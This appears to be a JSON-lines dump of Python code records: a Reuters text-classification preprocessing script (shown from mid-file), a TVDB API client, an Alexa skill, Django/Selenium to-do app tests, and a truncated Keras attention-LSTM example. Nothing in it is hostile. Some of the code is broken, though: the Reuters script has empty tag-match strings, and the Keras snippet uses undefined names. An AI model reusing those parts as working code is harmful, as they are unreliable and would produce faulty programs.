d_tag.children: # find relevant tags to current call and add text to a master string\r\n if(place == child):\r\n try:\r\n total_text += reuter_tag.body.get_text()\r\n except:\r\n total_text += \"\"\r\n \r\n # This subsequent section is devoted to removing a few bits of rather unwieldy extra characters in our \r\n # output string. We wanted to retain as many words as possible, so more tedious methods of extraction,\r\n # such as removing '\\n' from the MIDDLE of the word was required. This part written by Afnan.\r\n array = total_text.split()\r\n new_array = []\r\n for word in array: # each word gets examined and picked apart if it contains the offending characters\r\n new_word = \"\"\r\n if '\\n' in word: # removing line breaks, wherever they may occur\r\n subword = word.split('\\n')\r\n for part in subword:\r\n if '\\n' not in part:\r\n new_word += part\r\n word = new_word\r\n new_word = \"\"\r\n if '.' in word: # removing punctuation\r\n subword = word.split('.')\r\n for part in subword:\r\n if '.' not in part:\r\n new_word += part\r\n word = new_word\r\n new_word = \"\"\r\n if ',' in word: # removing punctuation\r\n subword = word.split(',')\r\n for part in subword:\r\n if ',' not in part:\r\n new_word += part\r\n word = new_word\r\n new_word = \"\"\r\n if '\"' in word: # removing punctuation\r\n subword = word.split('\"')\r\n for part in subword:\r\n if '\"' not in part:\r\n new_word += part\r\n word = new_word\r\n word += \" \"\r\n new_array.append(word)\r\n \r\n cleaned_text = \"\"\r\n for newword in new_array:# now removing some final pesky words as well as any numbers we don't want in our analysis\r\n if \"reuter\" not in newword.lower() and \"\\x03\" not in newword and '\"' not in newword and newword.isdigit() == False:\r\n cleaned_text += newword \r\n \r\n # Create vector and return to calling function\r\n places_bag_vector[place] = cleaned_text\r\n # output looks like: {'afghanistan' : 'Pakistan complained to the United Nations today that...', 'algeria' : 'Liquefied natural gas imports from Algeria...', ....}\r\n return places_bag_vector\r\n\r\n\r\n\r\ndef weighted_get_text(header_importance, place, sources, weighted_bag_vector, t_type):\r\n\r\n # This portion involving reading the body text in from the file mostly done by Kumar\r\n print (place)\r\n total_text = \"\"\r\n for source in sources:\r\n with open(source) as f:\r\n data = f.read()\r\n soup = BeautifulSoup(data, 'html.parser') # parse using HTML parser, close to structure of these files\r\n reuters_tags = soup.find_all('reuters')\r\n for reuter_tag in reuters_tags: # get information stored within each reuters tag\r\n if t_type == 'topics':\r\n p_tag = reuter_tag.topics\r\n else:\r\n p_tag = reuter_tag.places\r\n \r\n d_tags = p_tag.find_all('d') # find all places/topics mentioned\r\n for d_tag in d_tags:\r\n for child in d_tag.children: # find relevant tags to current call and add text to a master string\r\n if(place == child):\r\n \r\n try:\r\n total_text += reuter_tag.body.get_text()\r\n except:\r\n total_text += \"\"\r\n\r\n title_tags = reuter_tag.find_all('title')\r\n if (len(title_tags) > 0):\r\n for title_tag in title_tags:\r\n for i in range(header_importance):\r\n total_text += title_tag.get_text()\r\n total_text += ' '\r\n \r\n # This subsequent section is devoted to removing a few bits of rather unwieldy extra characters in our \r\n # output string. We wanted to retain as many words as possible, so more tedious methods of extraction,\r\n # such as removing '\\n' from the MIDDLE of the word was required. This part written by Afnan.\r\n array = total_text.split()\r\n new_array = []\r\n for word in array: # each word gets examined and picked apart if it contains the offending characters\r\n new_word = \"\"\r\n if '\\n' in word: # removing line breaks, wherever they may occur\r\n subword = word.split('\\n')\r\n for part in subword:\r\n if '\\n' not in part:\r\n new_word += part\r\n word = new_word\r\n new_word = \"\"\r\n if '.' in word: # removing punctuation\r\n subword = word.split('.')\r\n for part in subword:\r\n if '.' not in part:\r\n new_word += part\r\n word = new_word\r\n new_word = \"\"\r\n if ',' in word: # removing punctuation\r\n subword = word.split(',')\r\n for part in subword:\r\n if ',' not in part:\r\n new_word += part\r\n word = new_word\r\n new_word = \"\"\r\n if '\"' in word: # removing punctuation\r\n subword = word.split('\"')\r\n for part in subword:\r\n if '\"' not in part:\r\n new_word += part\r\n word = new_word\r\n new_word = \"\"\r\n if '<' in word: # removing punctuation\r\n subword = word.split('<')\r\n for part in subword:\r\n if '<' not in part:\r\n new_word += part\r\n word = new_word\r\n new_word = \"\"\r\n if '>' in word: # removing punctuation\r\n subword = word.split('>')\r\n for part in subword:\r\n if '>' not in part:\r\n new_word += part\r\n word = new_word\r\n word += \" \"\r\n new_array.append(word)\r\n \r\n cleaned_text = \"\"\r\n for newword in new_array:# now removing some final pesky words as well as any numbers we don't want in our analysis\r\n if \"reuter\" not in newword.lower() and \"\\x03\" not in newword and '\"' not in newword and newword.isdigit() == False:\r\n if (re.search(place, newword, re.IGNORECASE)):\r\n for i in range(header_importance * 2):\r\n cleaned_text += newword\r\n else:\r\n cleaned_text += newword\r\n \r\n cleaned_text.rstrip()\r\n\r\n wordList = []\r\n words = re.findall(r'\\b[a-zA-Z]+\\b', cleaned_text)\r\n for word in words:\r\n wordList.append(word.lower())\r\n\r\n wordPairs = []\r\n for word in set(wordList):\r\n wordPairs.append([word, wordList.count(word)])\r\n \r\n cleaned_text = \"\"\r\n for wordPair in wordPairs:\r\n if wordPair[1] > 1:\r\n for i in range(wordPair[1]):\r\n cleaned_text += wordPair[0] + ' '\r\n \r\n # Create vector and return to calling function\r\n weighted_bag_vector[place] = cleaned_text\r\n # output looks like: {'afghanistan' : 'Pakistan complained to the United Nations today that...', 'algeria' : 'Liquefied natural gas imports from Algeria...', ....}\r\n return weighted_bag_vector\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sources = [\"files/reut2-000.sgm\", \"files/reut2-001.sgm\", \"files/reut2-002.sgm\", \\\r\n \"files/reut2-003.sgm\", \"files/reut2-004.sgm\", \"files/reut2-005.sgm\", \\\r\n \"files/reut2-006.sgm\", \"files/reut2-007.sgm\", \"files/reut2-008.sgm\", \\\r\n \"files/reut2-009.sgm\", \"files/reut2-010.sgm\", \"files/reut2-011.sgm\", \\\r\n \"files/reut2-012.sgm\", \"files/reut2-013.sgm\", \"files/reut2-014.sgm\", \\\r\n \"files/reut2-015.sgm\", \"files/reut2-016.sgm\", \"files/reut2-017.sgm\", \\\r\n \"files/reut2-018.sgm\", \"files/reut2-019.sgm\", \"files/reut2-020.sgm\", \\\r\n \"files/reut2-021.sgm\"]\r\n \r\n total_blank_places = 0\r\n total_blank_topics = 0\r\n total_countries = []\r\n total_topics = []\r\n root = TrieNode('*')\r\n \r\n \r\n # Here, my algorithm for splitting the elements of the TOPICS and PLACES fields is my original work\r\n for source in sources:\r\n with open(source) as f: # Open the file and read line by line to a list array\r\n array = []\r\n for line in f:\r\n array.append(line)\r\n # Since PLACES were contained within one line of code according to the data I saw, I assumed \r\n # that any line with the PLACES tag would contain all of the location info for that article\r\n places = []\r\n for index in array: # Look at lines containing the \"PLACES\" tag and read those into a separate list\r\n if \"\" in index:\r\n places.append(index)\r\n # Once I got the line, I split the string on the multiple \"\" tags to extract the location\r\n # information within\r\n new_places = []\r\n for place in places:\r\n new_places.extend(multi_splitter(place, \"\")) # Using the helpful method above, I split on one or more tags\r\n new_places = [x for x in new_places if x not in ('', '/', '\\n', 'PLACES', '/PLACES')]# I then removed instances of tag information or blank information from the overall list\r\n \r\n # One trick I learned in coding Python for work is that by casting a list as a set, \r\n # you can remove duplicates in one line of code since sets do not contain duplicates\r\n distinct_countries = set(new_places)\r\n total_countries.extend(distinct_countries)\r\n \r\n # Next I moved onto TOPICS, using many of the same methods\r\n # that I used for PLACES to count and extract the information\r\n topics = []\r\n for index in array:\r\n if \"\" in index:\r\n topics.append(index)\r\n \r\n # Once again I used the same string split method to extract the contents of each field\r\n tops = []\r\n for topic in topics:\r\n tops.extend(multi_splitter(topic, \"\"))\r\n tops = [x for x in tops if x not in ('', '/', '\\n', 'TOPICS', '/TOPICS')]\r\n \r\n # Counted distinct topics using the same cast to set \r\n distinct_topics = set(tops)\r\n # You may notice the issue with simply extending the list of total topics\r\n # There may end up being duplicates between documents that are not addressed\r\n # I address this issue in the final step: printing the statistics after all loops are finished\r\n total_topics.extend(distinct_topics)\r\n \r\n # Here, we create all output vectors already sorted into training and test groups based on cross-validation where k = 21\r\n # These files are then fed into the classifier program \r\n for i in range(3):\r\n training_sources = sources[:i] + sources[i+1:]\r\n test_sources = []\r\n test_sources.append(sources[i])\r\n # Here we begin to make our bag of words vectors\r\n # First we make the training groups\r\n \r\n # TEST SET FOR SPEED\r\n total_countries = ['afghanistan', 'uk', 'france', 'canada','turkey','usa','japan','pakistan']\r\n total_topics = ['acq', 'alum', 'lumber', 'jobs', 'interest', 'income','trade', 'wheat']\r\n # TEST\r\n \r\n\r\n #\r\n # Vector 1: Generic Bag of Words method. Uses get_text to create bag of words.\r\n #\r\n bag_vector = {}\r\n for country in sorted(set(total_countries)):\r\n if \"\" not in country:\r\n get_text(country, training_sources, bag_vector, 'places')\r\n with open('place_bag_train' + str(i) + '.csv', 'w') as csv_file:\r\n writer = csv.writer(csv_file)\r\n writer.writerow([\"country\", \"text\"])\r\n for key, value in bag_vector.items():\r\n writer.writerow([key, value])\r\n\r\n bag_vector = {}\r\n for topic in sorted(set(total_topics)):\r\n if \"\" not in topic:\r\n get_text(topic, training_sources, bag_vector, 'topics')\r\n with open('topic_bag_train' + str(i) + '.csv', 'w') as csv_file:\r\n writer = csv.writer(csv_file)\r\n writer.writerow([\"topic\", \"text\"])\r\n for key, value in bag_vector.items():\r\n writer.writerow([key, value])\r\n\r\n # Testing bag of words data.\r\n bag_vector = {}\r\n for country in sorted(set(total_countries)):\r\n if \"\" not in country:\r\n get_text(country, test_sources, bag_vector, 'places')\r\n with open('place_bag_test' + str(i) + '.csv', 'w') as csv_file:\r\n writer = csv.writer(csv_file)\r\n writer.writerow([\"id\", \"text\"])\r\n for key, value in bag_vector.items():\r\n writer.writerow([key, value])\r\n\r\n bag_vector = {}\r\n for topic in sorted(set(total_topics)):\r\n if \"\" not in topic:\r\n get_text(topic, test_sources, bag_vector, 'topics')\r\n with open('topic_bag_test' + str(i) + '.csv', 'w') as csv_file:\r\n writer = csv.writer(csv_file)\r\n writer.writerow([\"id\", \"text\"])\r\n for key, value in bag_vector.items():\r\n writer.writerow([key, value])\r\n\r\n #\r\n # Vector 2: Weighted Bag of Words method. Uses weighted_get_text to create bag of words. Title words are five times as important,\r\n # the name of the place or topic is ten times as important, and words which only appear once are removed from the bag of words.\r\n # Words are added multiple times based on their importance.\r\n #\r\n weighted_bag_vector = {}\r\n for country in sorted(set(total_countries)):\r\n if \"\" not in country:\r\n weighted_get_text(5, country, training_sources, weighted_bag_vector, 'places')\r\n with open('place_weighted_train' + str(i) + '.csv', 'w') as csv_file:\r\n writer = csv.writer(csv_file)\r\n writer.writerow([\"country\", \"text\"])\r\n for key, value in weighted_bag_vector.items():\r\n writer.writerow([key, value])\r\n \r\n weighted_bag_vector = {}\r\n for topic in sorted(set(total_topics)):\r\n if \"\" not in topic:\r\n weighted_get_text(5, topic, training_sources, weighted_bag_vector, 'topics')\r\n with open('topic_weighted_train' + str(i) + '.csv', 'w') as csv_file:\r\n writer = csv.writer(csv_file)\r\n writer.writerow([\"topic\", \"text\"])\r\n for key, value in weighted_bag_vector.items():\r\n writer.writerow([key, value])\r\n\r\n # Testing modified bag of words data.\r\n weighted_bag_vector = {}\r\n for country in sorted(set(total_countries)):\r\n if \"\" not in country:\r\n weighted_get_text(5, country, test_sources, weighted_bag_vector, 'places')\r\n with open('place_weighted_test' + str(i) + '.csv', 'w') as csv_file:\r\n writer = csv.writer(csv_file)\r\n writer.writerow([\"id\", \"text\"])\r\n for key, value in weighted_bag_vector.items():\r\n writer.writerow([key, value])\r\n \r\n weighted_bag_vector = {}\r\n for topic in sorted(set(total_topics)):\r\n if \"\" not in topic:\r\n weighted_get_text(5, topic, test_sources, weighted_bag_vector, 'topics')\r\n with open('topic_weighted_test' + str(i) + '.csv', 'w') as csv_file:\r\n writer = csv.writer(csv_file)\r\n writer.writerow([\"id\", \"text\"])\r\n for key, value in weighted_bag_vector.items():\r\n writer.writerow([key, value])\r\n \r\n \r\n \r\n \r\n \r\n \r\n", "sub_path": "countTagsFinalWeighted.py", "file_name": "countTagsFinalWeighted.py", "file_ext": "py", "file_size_in_byte": 20498, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.Tuple", "line_number": 52, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 101, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 174, "usage_type": "call"}, {"api_name": "re.search", "line_number": 253, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 253, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 262, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 366, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 376, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 387, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 397, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 412, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 422, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 433, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 443, "usage_type": "call"}]} +{"seq_id": "126231612", "text": "import requests\nimport json\nimport yaml\nfrom pprint import pprint\nimport os\r\nfrom jinja2 import Environment, FileSystemLoader\r\n\r\nPATH = os.path.dirname(os.path.abspath(__file__))\r\nTEMPLATE_ENVIRONMENT = Environment(\r\n autoescape=False,\r\n loader=FileSystemLoader(os.path.join(PATH, 'templates')),\r\n trim_blocks=False)\r\n\ndef load_settings():\n with open(\"settings.yml\", 'r') as stream:\n try:\n settings = yaml.load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n return settings\n\ndef get_token(settings):\n payload= {\"apikey\":settings['api_key'],\n \"username\":settings['user_name'],\n \"userkey\":settings['user_key']}\n r = requests.post(settings['url'] + \"/login\", json=payload)\n response = r.json()\n token = response[\"token\"]\n return token\n \ndef get_series(settings, token): \n headers = {'Authorization': 'Bearer ' + token}\n payload = {'name': 'Star Trek Discovery'}\n r = requests.get(settings['url'] + \"/search/series\",\n params=payload, headers=headers)\n response = r.json()\n return response\n\n\ndef get_series_details(settings, token, sid):\n headers = {'Authorization': 'Bearer ' + token}\n r = requests.get(settings['url'] + \"/series/\" + \n str(sid) + \"/episodes\", headers=headers)\n response = r.json()\n return response\n \ndef render_template(template_filename, context):\r\n return TEMPLATE_ENVIRONMENT.get_template(template_filename).render(context)\r\n\ndef create_md(series, series_details):\n fname = \"output.md\"\n context = { 'series_details': series_details,\n 'series': series['data'][0]\n }\n with open(fname, 'w') as f: \n content = render_template('output.j2', context) \n f.write(content) \n\ndef main():\n settings = load_settings()\n token = get_token(settings) \n series = get_series(settings, token)\n series_id = series['data'][0]['id']\n series_details = get_series_details(settings, token, series_id)\n create_md(series, series_details)\n \nif __name__ == \"__main__\":\n main()\n \n\n", "sub_path": "tvdb/tvdb.py", "file_name": "tvdb.py", "file_ext": "py", "file_size_in_byte": 2112, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 9, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 17, "usage_type": "call"}, {"api_name": "yaml.YAMLError", "line_number": 18, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "575180067", "text": "import logging\nimport requests\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import AbstractRequestHandler\nfrom ask_sdk_core.dispatch_components import AbstractExceptionHandler\nimport ask_sdk_core.utils as ask_utils\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model import Response\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Skill Launch.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n\n return ask_utils.is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"Ciao, puoi chiedermi di darti l'ultimo articolo\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass BlogIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Hello World Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"BlogIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n\n data = requests.get(\"https://www.20tab.com/api/articles.json?page_size=1\").json()\n\n try:\n title = data[\"results\"][0]['title_it']\n speak_output = f\"L'ultimo articolo ha come titolo: {title}\"\n except KeyError:\n speak_output = \"Mi dispiace ma non ho trovato alcun articolo\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n # .ask(\"add a reprompt if you want to keep the session open for the user to respond\")\n .response\n )\n\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Help Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"Puoi chiedermi di dirti qual'è l'ultimo articolo\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass CancelOrStopIntentHandler(AbstractRequestHandler):\n \"\"\"Single handler for Cancel and Stop Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (ask_utils.is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n ask_utils.is_intent_name(\"AMAZON.StopIntent\")(handler_input))\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"Goodbye!\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\n\nclass SessionEndedRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Session End.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"SessionEndedRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n\n # Any cleanup logic goes here.\n\n return handler_input.response_builder.response\n\n\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"Generic error handling to capture any syntax or routing errors. If you receive an error\n stating the request handler chain is not found, you have not implemented a handler for\n the intent being invoked or included it in the skill builder below.\n \"\"\"\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speak_output = \"Si è verificato un errore. Riprova\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n# The SkillBuilder object acts as the entry point for your skill, routing all request and response\n# payloads to the handlers above. Make sure any new handlers or interceptors you've\n# defined are included below. The order matters - they're processed top to bottom.\n\nsb = SkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(BlogIntentHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(CancelOrStopIntentHandler())\nsb.add_request_handler(SessionEndedRequestHandler())\n\nsb.add_exception_handler(CatchAllExceptionHandler())\n\nskill = sb.create()\n", "sub_path": "alexa/skill.py", "file_name": "skill.py", "file_ext": "py", "file_size_in_byte": 4901, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 15, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_request_type", "line_number": 20, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 20, "usage_type": "name"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 34, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_intent_name", "line_number": 38, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 38, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 59, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_intent_name", "line_number": 63, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 63, "usage_type": "name"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 77, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_intent_name", "line_number": 81, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 81, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_intent_name", "line_number": 82, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 82, "usage_type": "name"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 95, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_request_type", "line_number": 99, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 99, "usage_type": "name"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractExceptionHandler", "line_number": 109, "usage_type": "name"}, {"api_name": "ask_sdk_core.skill_builder.SkillBuilder", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "520171752", "text": "\nfrom django.contrib.staticfiles.testing import StaticLiveServerCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport unittest\nimport sys\n\n\nclass NewVisitorTest(StaticLiveServerCase):\n\n\t@classmethod\n\tdef setUpClass(cls):\n\t\tfor arg in sys.argv:\n\t\t\tif 'liveserver' in arg:\n\t\t\t\tcls.server_url = 'http://' + arg.split('=')[1]\n\t\t\t\treturn\n\t\tsuper().setUpClass()\n\t\tcls.server_url = cls.live_server_url\n\t\t\n\t@classmethod\n\tdef tearDownClass(cls):\n\t\tif cls.server_url == cls.live_server_url:\n\t\t\tsuper().tearDownClass()\n\n\tdef setUp(self):\n\t\tself.browser = webdriver.Firefox()\n\t\tself.browser.implicitly_wait(3)\n\t\t\n\tdef tearDown(self):\n\t\tself.browser.quit()\n\t\t\n\tdef check_for_row_in_list_table(self, row_text):\n\t\ttable = self.browser.find_element_by_id('id_list_table')\n\t\trows = table.find_elements_by_tag_name('tr')\n\t\tself.assertIn(row_text, [row.text for row in rows])\n\t\t\n\tdef test_can_start_a_list_and_finish_it_later(self):\n\t\t# Anita heard about a new online to-do list \n\t\t# and decided to check out its home page\n\t\tself.browser.get(self.server_url)\n\t\tself.assertIn('To-Do', self.browser.title)\n\t\theader_text = self.browser.find_element_by_tag_name('h1').text\n\t\tself.assertIn('To-Do', header_text)\n\t\t\n\t\t# She is invited to enter an item right away\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tself.assertEqual(\n\t\t\tinputbox.get_attribute('placeholder'),\n\t\t\t'Enter a to-do item'\n\t\t)\n\t\t\n\t\t# She enters \"Do shopping\" into a textbox\n\t\tinputbox.send_keys('Do shopping')\n\t\t\n\t\t# When she hits enter the page updates to show a table with\n\t\t# \"1: Do shopping\" as an item\n\t\tinputbox.send_keys(Keys.ENTER)\n\t\tanita_list_url = self.browser.current_url\n\t\tself.assertRegex(anita_list_url, '/lists/.+/$')\n\t\tself.check_for_row_in_list_table('1: Do shopping')\n\t\t\t\t\n\t\t# There is still a textbox inviting her to enter another item\n\t\t# she enters \"Have fun\"\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tinputbox.send_keys('Have fun')\n\t\tinputbox.send_keys(Keys.ENTER)\n\t\t\n\t\t# The page updates again to show both items in the list\n\t\tself.check_for_row_in_list_table('1: Do shopping')\n\t\tself.check_for_row_in_list_table('2: Have fun')\n\t\t\n\t\t# A new user, Darwin, comes along \n\t\t\n\t\t## We use a new browser session to make sure that no information\n\t\t## of Anita's is coming through from cookies etc #\n\t\tself.browser.quit()\n\t\tself.browser = webdriver.Firefox()\n\t\t\n\t\t# Darwin visits the home page. There is no sign of Anita's items\n\t\tself.browser.get(self.server_url)\n\t\tpage_text = self.browser.find_element_by_tag_name('body').text\n\t\tself.assertNotIn('Have fun', page_text)\n\t\tself.assertNotIn('Do shopping', page_text)\n\t\t\n\t\t# Darwin starts a new list by entering an item. He's just a baby so...\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tinputbox.send_keys('Cause trouble')\n\t\tinputbox.send_keys(Keys.ENTER)\n\n\t\t# Darwin gets his own url\n\t\tdarwin_list_url = self.browser.current_url\n\t\tself.assertRegex(darwin_list_url, '/lists/.+/$')\n\t\tself.assertNotEqual(darwin_list_url, anita_list_url)\n\t\t\n\t\t# There is no trace of Anita's list\n\t\tpage_text = self.browser.find_element_by_tag_name('body').text\n\t\tself.assertNotIn('Have fun', page_text)\n\t\tself.assertIn('Cause trouble', page_text)\n\t\t\n\t\t# Both are now happy campers\n\t\t\n\t\t\n\tdef test_layout_and_styling(self):\n\t\t# Anita goes to the site\n\t\tself.browser.get(self.server_url)\n\t\tself.browser.set_window_size(1024, 768)\n\t\t\n\t\t# She notices the input box is centred\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tself.assertAlmostEqual(\n\t\t\tinputbox.location['x'] + inputbox.size['width'] / 2,\n\t\t\t512, delta=7)\n\t\t\t\n\t\t# She starts a new list and sees the input centred there too\n\t\tinputbox.send_keys('testing\\n')\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tself.assertAlmostEqual(\n\t\t\tinputbox.location['x'] + inputbox.size['width'] / 2,\n\t\t\t512, delta=7)\n\t\t", "sub_path": "functional_tests/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.contrib.staticfiles.testing.StaticLiveServerCase", "line_number": 9, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 57, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 57, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 66, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 66, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 77, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 77, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 88, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 88, "usage_type": "name"}]} +{"seq_id": "342794941", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input, concatenate, multiply, Dense, Permute, Reshape, LSTM, Activation\nfrom keras import optimizers\nfrom keras.utils.np_utils import to_categorical\nimport keras.backend as K\n\n\ndata = datasets.load_digits()\n\nX_data = data.images\ny_data = data.target\n\ny_data = to_categorical(y_data)\n\nX_train, X_test, y_train, y_test = train_test_split(X_data, y_data, test_size = 0.2, random_state = 777)\n\ndef attention_3d_block(inputs):\n # inputs.shape = (batch_size, time_steps, input_dim)\n input_dim = int(inputs.shape[2])\n a = Permute((2, 1))(inputs)\n a = Reshape((input_dim, TIME_STEPS))(a) # this line is not useful. It's just to know which dimension is what.\n a = Dense(TIME_STEPS, activation='softmax')(a)\n if SINGLE_ATTENTION_VECTOR:\n a = Lambda(lambda x: K.mean(x, axis=1), name='dim_reduction')(a)\n a = RepeatVector(input_dim)(a)\n a_probs = Permute((2, 1), name='attention_vec')(a)\n output_attention_mul = multiply([inputs, a_probs], name='attention_mul')\n return output_attention_mul\n\ndef attention_lstm():\n inputs = Input(shape=(TIME_STEPS, INPUT_DIM,))\n attention_mul = attention_3d_block(inputs)\n lstm_units = 32\n attention_mul = LSTM(lstm_units, return_sequences=False)(attention_mul)\n output = Dense(10, activation='softmax')(attention_mul)\n model = Model(inputs=[inputs], outputs=output)\n \n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n \n return model\n\nmodel = attention_lstm()\nmodel.fit([X_train], y_train, epochs = 100, batch_size = 64, validation_split = 0.3, verbose = 0)\n\nattention_vector = get_activations(model, [X_train[0]], print_shape_only=True, layer_name = 'attention_vec')[0].reshape(8,8)\n\nplt.imshow(attention_vector)\nplt.show()", "sub_path": "5. ETC/3-Attention-mechanism/2-2-attention-with-rnn.py", "file_name": "2-2-attention-with-rnn.py", "file_ext": "py", "file_size_in_byte": 1960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.datasets.load_digits", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 14, "usage_type": "name"}, {"api_name": 